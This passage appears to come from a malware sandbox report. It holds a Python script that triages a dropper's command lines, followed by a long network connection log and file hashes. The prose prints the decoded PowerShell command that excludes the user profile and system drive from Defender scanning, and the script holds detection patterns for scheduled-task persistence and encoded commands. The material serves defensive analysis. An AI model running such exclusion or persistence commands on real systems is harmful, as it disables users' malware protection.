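USER_WRITABLE = ("c:\\programdata\\", "c:\\users\\")

ENC_RE = re.compile(r'-e(?:nc(?:odedcommand)?)?\s+"?([A-Za-z0-9+/=]{16,})', re.I)


def decode_encoded_command(b64):
    """-EncodedCommand is base64 over UTF-16LE; decode it the way powershell.exe does."""
    return base64.b64decode(b64).decode("utf-16-le")


def strip_block_comments(script):
    """Drop <# ... #> comments (here pure junk to defeat string matching)
    and collapse the whitespace they leave behind."""
    return " ".join(re.sub(r"<#.*?#>", "", script, flags=re.S).split())


def triage(cmdline):
    """Return a list of (category, detail) findings for one command line."""
    findings = []
    low = cmdline.lower()

    m = ENC_RE.search(cmdline)
    if m:
        script = strip_block_comments(decode_encoded_command(m.group(1)))
        findings.append(("encoded-powershell", script))
        excl = re.search(r"add-mppreference.*?-exclusionpath\s+(\S+)", script, re.I)
        if excl:
            findings.append(("defender-exclusion", excl.group(1)))

    if "powercfg" in low and ("-timeout-" in low or "/hibernate off" in low):
        findings.append(("sleep-prevention", "host kept awake so scheduled tasks keep firing"))

    if "schtasks" in low and "/create" in low:
        tn = re.search(r'/TN\s+"([^"]+)"', cmdline, re.I)
        tr = re.search(r'/TR\s+"([^"]+)"', cmdline, re.I)
        sc = re.search(r"/SC\s+(\w+)(?:\s+/MO\s+(\d+))?", cmdline, re.I)
        name = tn.group(1) if tn else "?"
        target = tr.group(1) if tr else "?"
        sched = sc.group(1).lower() if sc else "?"
        if sc and sc.group(2):
            sched = "every %s %s" % (sc.group(2), sched)
        findings.append(("scheduled-task", "%s -> %s (%s)" % (name, target, sched)))
        if target.lower().startswith(USER_WRITABLE):
            findings.append(("user-writable-task-target", target))
        if name.rsplit("\\", 1)[-1].lower() in SYSTEM_NAMES:
            findings.append(("masquerading-task-name", name))

    m = re.search(r"\b7z(?:\.exe)?\s+[ex]\s+(\S+).*?\s-p(\S+)", cmdline, re.I)
    if m:
        findings.append(("password-archive", "%s password=%s" % (m.group(1), m.group(2))))

    if re.search(r"\battrib\b.*\+h\b", low):
        findings.append(("hide-file", cmdline.split("+H", 1)[-1].strip().strip('"')))

    return findings


def triage_all(cmdlines=COMMAND_LINES):
    """Map each command line to its findings; lines with none are omitted."""
    return {c: triage(c) for c in cmdlines if triage(c)}


if __name__ == "__main__":
    for cmd, hits in triage_all().items():
        print(cmd[:70] + ("..." if len(cmd) > 70 else ""))
        for cat, detail in hits:
            print("   %-26s %s" % (cat, detail))
```

Decoded and de-junked, the PowerShell reads `Add-MpPreference -ExclusionPath @($env:UserProfile,$env:SystemDrive) -Force`, which excludes the whole user profile and the system drive from Defender scanning before the scheduled tasks ever run; the powercfg calls keep the host from sleeping so the five-minute task keeps firing. Note that `Add-MpPreference` needs administrator rights, so a successful exclusion is also a sign the dropper ran elevated.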
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | www.mediafire.com | udp |
| US | 104.16.114.74:443 | www.mediafire.com | tcp |
| US | 8.8.8.8:53 | 64.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.114.16.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 8.8.8.8:53 | static.mediafire.com | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 8.8.8.8:53 | ajax.googleapis.com | udp |
| US | 13.107.21.237:443 | g.bing.com | tcp |
| GB | 142.250.180.4:443 | www.google.com | tcp |
| GB | 142.250.179.234:443 | ajax.googleapis.com | tcp |
| US | 8.8.8.8:53 | cdn.amplitude.com | udp |
| GB | 18.154.84.60:443 | cdn.amplitude.com | tcp |
| US | 8.8.8.8:53 | 237.21.107.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.180.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 234.16.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 234.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 227.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.amplitude.com | udp |
| US | 35.82.163.160:443 | api.amplitude.com | tcp |
| US | 8.8.8.8:53 | region1.analytics.google.com | udp |
| US | 216.239.34.36:443 | region1.analytics.google.com | tcp |
| US | 8.8.8.8:53 | stats.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | www.google.co.uk | udp |
| BE | 74.125.71.155:443 | stats.g.doubleclick.net | tcp |
| GB | 172.217.16.227:443 | www.google.co.uk | tcp |
| US | 8.8.8.8:53 | 72.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 99.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 60.84.154.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 107.39.156.108.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 78.204.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 160.163.82.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 36.34.239.216.in-addr.arpa | udp |
| BE | 74.125.71.155:443 | stats.g.doubleclick.net | udp |
| GB | 142.250.180.4:443 | www.google.com | udp |
| GB | 172.217.16.227:443 | www.google.co.uk | udp |
| US | 8.8.8.8:53 | 155.71.125.74.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 227.16.217.172.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | | udp |
| US | 216.239.34.36:443 | region1.analytics.google.com | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 147.142.123.92.in-addr.arpa | udp |
| US | 216.239.34.36:443 | region1.analytics.google.com | udp |
| US | 8.8.8.8:53 | connect.facebook.net | udp |
| IT | 157.240.203.2:443 | connect.facebook.net | tcp |
| US | 8.8.8.8:53 | translate.google.com | udp |
| GB | 172.217.169.78:443 | translate.google.com | tcp |
| US | 8.8.8.8:53 | 2.203.240.157.in-addr.arpa | udp |
| US | 8.8.8.8:53 | translate.googleapis.com | udp |
| GB | 216.58.201.106:443 | translate.googleapis.com | tcp |
| US | 8.8.8.8:53 | www.facebook.com | udp |
| US | 8.8.8.8:53 | 106.201.58.216.in-addr.arpa | udp |
| GB | 163.70.147.35:443 | www.facebook.com | tcp |
| US | 8.8.8.8:53 | translate-pa.googleapis.com | udp |
| US | 8.8.8.8:53 | 35.147.70.163.in-addr.arpa | udp |
| GB | 142.250.180.4:443 | www.google.com | udp |
| GB | 142.250.179.234:443 | translate-pa.googleapis.com | udp |
| GB | 216.58.201.106:443 | translate-pa.googleapis.com | udp |
| US | 8.8.8.8:53 | the.gatekeeperconsent.com | udp |
| US | 8.8.8.8:53 | btloader.com | udp |
| US | 104.21.42.32:443 | the.gatekeeperconsent.com | tcp |
| US | 104.22.74.216:443 | btloader.com | tcp |
| US | 8.8.8.8:53 | www.ezojs.com | udp |
| US | 104.21.63.106:443 | www.ezojs.com | tcp |
| US | 8.8.8.8:53 | privacy.gatekeeperconsent.com | udp |
| GB | 172.217.169.78:443 | translate.google.com | udp |
| US | 8.8.8.8:53 | static.cloudflareinsights.com | udp |
| US | 172.67.199.186:443 | privacy.gatekeeperconsent.com | tcp |
| US | 104.16.79.73:443 | static.cloudflareinsights.com | tcp |
| US | 8.8.8.8:53 | api.btloader.com | udp |
| US | 130.211.23.194:443 | api.btloader.com | tcp |
| US | 8.8.8.8:53 | ad-delivery.net | udp |
| US | 104.26.3.70:443 | ad-delivery.net | tcp |
| US | 104.26.3.70:443 | ad-delivery.net | tcp |
| US | 8.8.8.8:53 | cdn.otnolatrnup.com | udp |
| US | 104.16.52.110:443 | cdn.otnolatrnup.com | tcp |
| US | 8.8.8.8:53 | g.ezoic.net | udp |
| FR | 35.181.89.222:443 | g.ezoic.net | tcp |
| US | 8.8.8.8:53 | www.mediafiredls.com | udp |
| US | 8.8.8.8:53 | go.ezodn.com | udp |
| US | 130.211.23.194:443 | api.btloader.com | udp |
| US | 8.8.8.8:53 | 32.42.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 216.74.22.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 106.63.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.79.16.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 186.199.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.23.211.130.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 102.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 70.3.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 222.89.181.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 110.52.16.104.in-addr.arpa | udp |
| US | 172.67.73.78:443 | www.mediafiredls.com | tcp |
| US | 172.67.142.121:443 | go.ezodn.com | tcp |
| US | 172.67.142.121:443 | go.ezodn.com | tcp |
| US | 172.67.142.121:443 | go.ezodn.com | tcp |
| US | 172.67.142.121:443 | go.ezodn.com | tcp |
| US | 172.67.142.121:443 | go.ezodn.com | tcp |
| US | 172.67.142.121:443 | go.ezodn.com | tcp |
| US | 8.8.8.8:53 | otnolatrnup.com | udp |
| US | 8.8.8.8:53 | securepubads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | g.ezodn.com | udp |
| GB | 172.217.169.34:443 | securepubads.g.doubleclick.net | tcp |
| US | 8.8.8.8:53 | bshr.ezodn.com | udp |
| US | 104.21.87.79:443 | bshr.ezodn.com | tcp |
| US | 8.8.8.8:53 | tags.crwdcntrl.net | udp |
| GB | 216.58.204.66:443 | googleads.g.doubleclick.net | tcp |
| US | 8.8.8.8:53 | ad.crwdcntrl.net | udp |
| US | 8.8.8.8:53 | bcp.crwdcntrl.net | udp |
| GB | 172.217.169.34:443 | securepubads.g.doubleclick.net | udp |
| GB | 18.245.143.118:443 | tags.crwdcntrl.net | tcp |
| IE | 52.50.240.62:443 | bcp.crwdcntrl.net | tcp |
| IE | 54.72.120.129:443 | bcp.crwdcntrl.net | tcp |
| US | 8.8.8.8:53 | 78.73.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 121.142.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.180.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 34.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 66.204.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 79.87.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 118.143.245.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 62.240.50.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 129.120.72.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | fundingchoicesmessages.google.com | udp |
| FR | 35.181.89.222:443 | g.ezoic.net | tcp |
| GB | 216.58.204.66:443 | googleads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | id.a-mx.com | udp |
| US | 8.8.8.8:53 | gum.criteo.com | udp |
| US | 8.8.8.8:53 | id5-sync.com | udp |
| US | 8.8.8.8:53 | id.hadron.ad.gt | udp |
| US | 8.8.8.8:53 | ups.analytics.yahoo.com | udp |
| US | 8.8.8.8:53 | api.rlcdn.com | udp |
| US | 8.8.8.8:53 | id.crwdcntrl.net | udp |
| US | 8.8.8.8:53 | cdn.jsdelivr.net | udp |
| US | 8.8.8.8:53 | match.adsrvr.org | udp |
| US | 8.8.8.8:53 | cdn.id5-sync.com | udp |
| US | 8.8.8.8:53 | static.criteo.net | udp |
| US | 8.8.8.8:53 | cdn.prod.uidapi.com | udp |
| US | 8.8.8.8:53 | invstatic101.creativecdn.com | udp |
| US | 8.8.8.8:53 | cdn-ima.33across.com | udp |
| NL | 79.127.227.46:443 | id.a-mx.com | tcp |
| NL | 178.250.1.11:443 | gum.criteo.com | tcp |
| DE | 162.19.138.116:443 | id5-sync.com | tcp |
| US | 104.22.5.69:443 | id.hadron.ad.gt | tcp |
| DE | 3.75.62.37:443 | ups.analytics.yahoo.com | tcp |
| US | 52.223.40.198:443 | match.adsrvr.org | tcp |
| US | 34.102.146.192:443 | oa.openxcdn.net | tcp |
| US | 34.120.133.55:443 | api.rlcdn.com | tcp |
| US | 34.96.70.87:443 | invstatic101.creativecdn.com | tcp |
| US | 151.101.193.229:443 | cdn.jsdelivr.net | tcp |
| US | 172.67.38.106:443 | cdn.id5-sync.com | tcp |
| GB | 18.245.255.11:443 | cdn.prod.uidapi.com | tcp |
| NL | 178.250.1.3:443 | static.criteo.net | tcp |
| US | 104.18.35.167:443 | cdn-ima.33across.com | tcp |
| US | 8.8.8.8:53 | tpc.googlesyndication.com | udp |
| GB | 142.250.178.1:443 | tpc.googlesyndication.com | tcp |
| US | 8.8.8.8:53 | apps.identrust.com | udp |
| US | 8.8.8.8:53 | oajs.openx.net | udp |
| GB | 88.221.134.137:80 | apps.identrust.com | tcp |
| US | 8.8.8.8:53 | lb.eu-1-id5-sync.com | udp |
| GB | 88.221.134.137:80 | apps.identrust.com | tcp |
| US | 8.8.8.8:53 | dnacdn.net | udp |
| US | 34.120.135.53:443 | oajs.openx.net | tcp |
| DE | 162.19.138.120:443 | lb.eu-1-id5-sync.com | tcp |
| NL | 178.250.1.11:443 | dnacdn.net | tcp |
| US | 8.8.8.8:53 | btlr.sharethrough.com | udp |
| DE | 3.122.80.51:443 | btlr.sharethrough.com | tcp |
| US | 8.8.8.8:53 | 85c486937def8a0fa343f0c760af3bcd.safeframe.googlesyndication.com | udp |
| DE | 3.122.80.51:443 | btlr.sharethrough.com | tcp |
| DE | 3.122.80.51:443 | btlr.sharethrough.com | tcp |
| DE | 3.122.80.51:443 | btlr.sharethrough.com | tcp |
| DE | 3.122.80.51:443 | btlr.sharethrough.com | tcp |
| US | 8.8.8.8:53 | htlb.casalemedia.com | udp |
| US | 8.8.8.8:53 | ghb.adtelligent.com | udp |
| US | 8.8.8.8:53 | hb-api.omnitagjs.com | udp |
| US | 8.8.8.8:53 | hbopenbid.pubmatic.com | udp |
| US | 8.8.8.8:53 | prebid.smilewanted.com | udp |
| US | 8.8.8.8:53 | hb.yellowblue.io | udp |
| US | 8.8.8.8:53 | onetag-sys.com | udp |
| US | 8.8.8.8:53 | prebid.a-mo.net | udp |
| US | 172.64.151.101:443 | htlb.casalemedia.com | tcp |
| GB | 142.250.178.1:443 | tpc.googlesyndication.com | udp |
| US | 23.227.151.194:443 | ghb.adtelligent.com | tcp |
| US | 104.22.31.209:443 | prebid.smilewanted.com | tcp |
| US | 104.22.31.209:443 | prebid.smilewanted.com | tcp |
| US | 104.22.31.209:443 | prebid.smilewanted.com | tcp |
| US | 104.22.31.209:443 | prebid.smilewanted.com | tcp |
| US | 104.22.31.209:443 | prebid.smilewanted.com | tcp |
| GB | 108.138.217.66:443 | hb.yellowblue.io | tcp |
| GB | 185.64.190.77:443 | hbopenbid.pubmatic.com | tcp |
| GB | 142.250.180.1:443 | 85c486937def8a0fa343f0c760af3bcd.safeframe.googlesyndication.com | tcp |
| NL | 147.75.84.158:443 | prebid.a-mo.net | tcp |
| DE | 51.89.9.252:443 | onetag-sys.com | tcp |
| FR | 185.255.84.151:443 | hb-api.omnitagjs.com | tcp |
| US | 34.120.135.53:443 | oajs.openx.net | udp |
| US | 8.8.8.8:53 | 46.227.127.79.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.1.250.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.5.22.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.40.223.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 192.146.102.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.133.120.34.in-addr.arpa | udp |
| DE | 51.89.9.252:443 | onetag-sys.com | udp |
| US | 8.8.8.8:53 | 87.70.96.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 229.193.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 116.138.19.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 106.38.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.255.245.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 37.62.75.3.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 167.35.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.1.250.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.178.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 137.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 226.21.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.135.120.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 120.138.19.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 51.80.122.3.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 101.151.64.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.31.22.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 77.190.64.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.180.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 66.217.138.108.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 158.84.75.147.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 252.9.89.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.151.227.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 151.84.255.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | google-bidout-d.openx.net | udp |
| US | 8.8.8.8:53 | ghb1.adtelligent.com | udp |
| GB | 142.250.180.4:443 | www.google.com | udp |
| US | 35.244.159.8:443 | google-bidout-d.openx.net | tcp |
| GB | 185.239.172.170:443 | ghb1.adtelligent.com | tcp |
| US | 8.8.8.8:53 | ag.gbc.criteo.com | udp |
| US | 8.8.8.8:53 | gem.gbc.criteo.com | udp |
| FR | 185.235.86.211:443 | ag.gbc.criteo.com | tcp |
| NL | 185.235.87.196:443 | gem.gbc.criteo.com | tcp |
| US | 8.8.8.8:53 | 8.159.244.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 170.172.239.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cdn.ampproject.org | udp |
| GB | 216.58.201.97:443 | cdn.ampproject.org | tcp |
| GB | 216.58.201.97:443 | cdn.ampproject.org | tcp |
| GB | 216.58.201.97:443 | cdn.ampproject.org | tcp |
| GB | 216.58.201.97:443 | cdn.ampproject.org | tcp |
| GB | 216.58.201.97:443 | cdn.ampproject.org | tcp |
| US | 8.8.8.8:53 | 2.178.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.87.235.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 211.86.235.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | download2265.mediafire.com | udp |
| US | 199.91.155.6:443 | download2265.mediafire.com | tcp |
| US | 199.91.155.6:443 | download2265.mediafire.com | tcp |
| GB | 142.250.178.1:443 | tpc.googlesyndication.com | udp |
| US | 8.8.8.8:53 | sys.ctrackapp.com | udp |
| GB | 108.138.233.10:443 | sys.ctrackapp.com | tcp |
| GB | 108.138.233.10:443 | sys.ctrackapp.com | tcp |
| US | 8.8.8.8:53 | 6.155.91.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | track.donecperficiam.com | udp |
| GB | 18.165.227.107:443 | track.donecperficiam.com | tcp |
| GB | 18.165.227.107:443 | track.donecperficiam.com | tcp |
| US | 8.8.8.8:53 | go.etoro.com | udp |
| NL | 104.109.249.151:443 | go.etoro.com | tcp |
| NL | 104.109.249.151:443 | go.etoro.com | tcp |
| US | 8.8.8.8:53 | marketing.etorostatic.com | udp |
| NL | 92.122.63.182:443 | marketing.etorostatic.com | tcp |
| US | 8.8.8.8:53 | 10.233.138.108.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 107.227.165.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 151.249.109.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | etoro-cdn.etorostatic.com | udp |
| NL | 92.122.63.182:443 | etoro-cdn.etorostatic.com | tcp |
| GB | 216.58.201.106:443 | translate-pa.googleapis.com | udp |
| US | 8.8.8.8:53 | 182.63.122.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 8.8.8.8:53 | cdn.cookielaw.org | udp |
| US | 104.19.177.52:443 | cdn.cookielaw.org | tcp |
| US | 8.8.8.8:53 | 52.177.19.104.in-addr.arpa | udp |
| US | 104.19.177.52:443 | cdn.cookielaw.org | tcp |
| US | 8.8.8.8:53 | bat.bing.com | udp |
| US | 8.8.8.8:53 | static.hotjar.com | udp |
| US | 8.8.8.8:53 | static.ads-twitter.com | udp |
| US | 8.8.8.8:53 | c0.adalyser.com | udp |
| US | 8.8.8.8:53 | amplify.outbrain.com | udp |
| US | 8.8.8.8:53 | cdn.taboola.com | udp |
| GB | 13.224.245.27:443 | static.hotjar.com | tcp |
| US | 151.101.193.44:443 | cdn.taboola.com | tcp |
| GB | 23.74.161.65:443 | amplify.outbrain.com | tcp |
| US | 204.79.197.237:443 | bat.bing.com | tcp |
| GB | 151.101.188.157:443 | static.ads-twitter.com | tcp |
| IE | 54.76.9.107:443 | c0.adalyser.com | tcp |
| BE | 74.125.71.155:443 | stats.g.doubleclick.net | udp |
| GB | 172.217.16.227:443 | www.google.co.uk | udp |
| US | 8.8.8.8:53 | 9944765.fls.doubleclick.net | udp |
| US | 8.8.8.8:53 | geolocation.onetrust.com | udp |
| GB | 172.217.16.230:443 | 9944765.fls.doubleclick.net | tcp |
| US | 104.18.32.137:443 | geolocation.onetrust.com | tcp |
| US | 8.8.8.8:53 | 27.245.224.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 44.193.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 65.161.74.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.188.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 107.9.76.54.in-addr.arpa | udp |
| GB | 172.217.16.230:443 | 9944765.fls.doubleclick.net | udp |
| US | 8.8.8.8:53 | trc.taboola.com | udp |
| US | 8.8.8.8:53 | tr.outbrain.com | udp |
| US | 8.8.8.8:53 | wave.outbrain.com | udp |
| US | 8.8.8.8:53 | t.co | udp |
| GB | 23.74.161.65:443 | wave.outbrain.com | tcp |
| GB | 23.74.161.65:443 | wave.outbrain.com | tcp |
| GB | 23.74.161.65:443 | wave.outbrain.com | tcp |
| GB | 23.74.161.65:443 | wave.outbrain.com | tcp |
| GB | 23.74.161.65:443 | wave.outbrain.com | tcp |
| GB | 23.74.161.65:443 | wave.outbrain.com | tcp |
| US | 50.31.142.223:443 | tr.outbrain.com | tcp |
| US | 50.31.142.223:443 | tr.outbrain.com | tcp |
| US | 8.8.8.8:53 | analytics.twitter.com | udp |
| PL | 93.184.221.165:443 | t.co | tcp |
| US | 104.244.42.67:443 | analytics.twitter.com | tcp |
| US | 8.8.8.8:53 | dc.services.visualstudio.com | udp |
| US | 8.8.8.8:53 | script.hotjar.com | udp |
| NL | 20.50.88.242:443 | dc.services.visualstudio.com | tcp |
| US | 8.8.8.8:53 | cdn.mxpnl.com | udp |
| FR | 18.164.52.73:443 | script.hotjar.com | tcp |
| US | 130.211.5.208:443 | cdn.mxpnl.com | tcp |
| US | 8.8.8.8:53 | 223.142.31.50.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 230.16.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 165.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 137.32.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 226.16.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.42.244.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 242.88.50.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.52.164.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 208.5.211.130.in-addr.arpa | udp |
| US | 8.8.8.8:53 | etorologsapi.etoro.com | udp |
| IE | 20.54.24.199:443 | etorologsapi.etoro.com | tcp |
| US | 8.8.8.8:53 | 199.24.54.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | csi.gstatic.com | udp |
| SG | 74.125.200.94:443 | csi.gstatic.com | tcp |
| SG | 74.125.200.94:443 | csi.gstatic.com | tcp |
| SG | 74.125.200.94:443 | csi.gstatic.com | tcp |
| US | 8.8.8.8:53 | 94.200.125.74.in-addr.arpa | udp |
| DE | 3.122.80.51:443 | btlr.sharethrough.com | tcp |
| FR | 185.255.84.151:443 | hb-api.omnitagjs.com | tcp |
| US | 8.8.8.8:53 | ghb2.adtelligent.com | udp |
| US | 23.227.151.242:443 | ghb2.adtelligent.com | tcp |
| US | 23.227.151.194:443 | ghb2.adtelligent.com | tcp |
| US | 8.8.8.8:53 | 242.151.227.23.in-addr.arpa | udp |
| GB | 142.250.178.1:443 | tpc.googlesyndication.com | udp |
| GB | 185.239.172.170:443 | ghb2.adtelligent.com | tcp |
| GB | 185.239.172.170:443 | ghb2.adtelligent.com | tcp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | a.nel.cloudflare.com | udp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | tcp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | udp |
| US | 8.8.8.8:53 | 1.80.190.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | btlr.sharethrough.com | udp |
| US | 23.227.151.242:443 | ghb2.adtelligent.com | tcp |
| US | 8.8.8.8:53 | hb-api.omnitagjs.com | udp |
| DE | 3.123.222.124:443 | btlr.sharethrough.com | tcp |
| FR | 185.255.84.150:443 | hb-api.omnitagjs.com | tcp |
| US | 8.8.8.8:53 | ghb.adtelligent.com | udp |
| GB | 185.83.69.58:443 | ghb.adtelligent.com | tcp |
| GB | 172.217.169.34:443 | securepubads.g.doubleclick.net | udp |
| GB | 185.239.172.170:443 | ghb.adtelligent.com | tcp |
| US | 8.8.8.8:53 | 124.222.123.3.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 150.84.255.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.69.83.185.in-addr.arpa | udp |
| GB | 142.250.178.1:443 | tpc.googlesyndication.com | udp |
| GB | 142.250.180.4:443 | www.google.com | udp |
| GB | 216.58.204.66:443 | googleads.g.doubleclick.net | udp |
| US | 216.239.34.36:443 | region1.analytics.google.com | udp |
| US | 8.8.8.8:53 | bargainnykwo.shop | udp |
| US | 104.21.47.93:443 | bargainnykwo.shop | tcp |
| US | 104.21.47.93:443 | bargainnykwo.shop | tcp |
| US | 8.8.8.8:53 | 93.47.21.104.in-addr.arpa | udp |
| US | 104.21.47.93:443 | bargainnykwo.shop | tcp |
| US | 104.21.47.93:443 | bargainnykwo.shop | tcp |
| US | 104.21.47.93:443 | bargainnykwo.shop | tcp |
| US | 104.21.47.93:443 | bargainnykwo.shop | tcp |
| US | 104.21.47.93:443 | bargainnykwo.shop | tcp |
| US | 104.21.47.93:443 | bargainnykwo.shop | tcp |
| DE | 147.45.47.81:80 | 147.45.47.81 | tcp |
| US | 8.8.8.8:53 | 81.47.45.147.in-addr.arpa | udp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| DE | 147.45.47.81:80 | 147.45.47.81 | tcp |
| DE | 147.45.47.81:80 | 147.45.47.81 | tcp |
Files
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 06b496d28461d5c01fc81bc2be6a9978 |
| SHA1 | 36e7a9d9c7a924d5bb448d68038c7fe5e6cbf5aa |
| SHA256 | e4a2d1395627095b0fa55e977e527ccb5b71dff3cd2d138df498f50f9f5ab507 |
| SHA512 | 6488a807c978d38d65010583c1e5582548ab8102ebd68ee827e603c9bdfcdbb9f98a488d31414a829409f6edca8bd2eb4aadd4ff31b144de41249fa63a26bc91 |
\??\pipe\LOCAL\crashpad_4332_TAJXSOPBZBPQBWXV
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | de1d175f3af722d1feb1c205f4e92d1e |
| SHA1 | 019cf8527a9b94bd0b35418bf7be8348be5a1c39 |
| SHA256 | 1b99cae942ebf99c31795fa279d51b1a2379ca0af7b27bd3c58ea6c78a033924 |
| SHA512 | f0dcd08afd3c6a761cc1afa2846ec23fb5438d6127ebd535a754498debabd0b1ebd04858d1b98be92faf14b512f982b1f3dcbb702860e96877eb835f763f9734 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 73e8cf7499c9ee0e50844e5483fe5a7a |
| SHA1 | 445dbb43dd1aca6b3bec8e5d321ea75a64d6f9af |
| SHA256 | 349c9516135c9c304e1367b888496ff317cabc3a57abf0a0d0533c99e65d8024 |
| SHA512 | 6d3f13e298526829543dc616fd502a484bad681d9c16fca9ba768c63097902a5bb728aa9fb8bc754a4b2337419842d7a7cb47989c8763e0c5b19af20326312d1 |
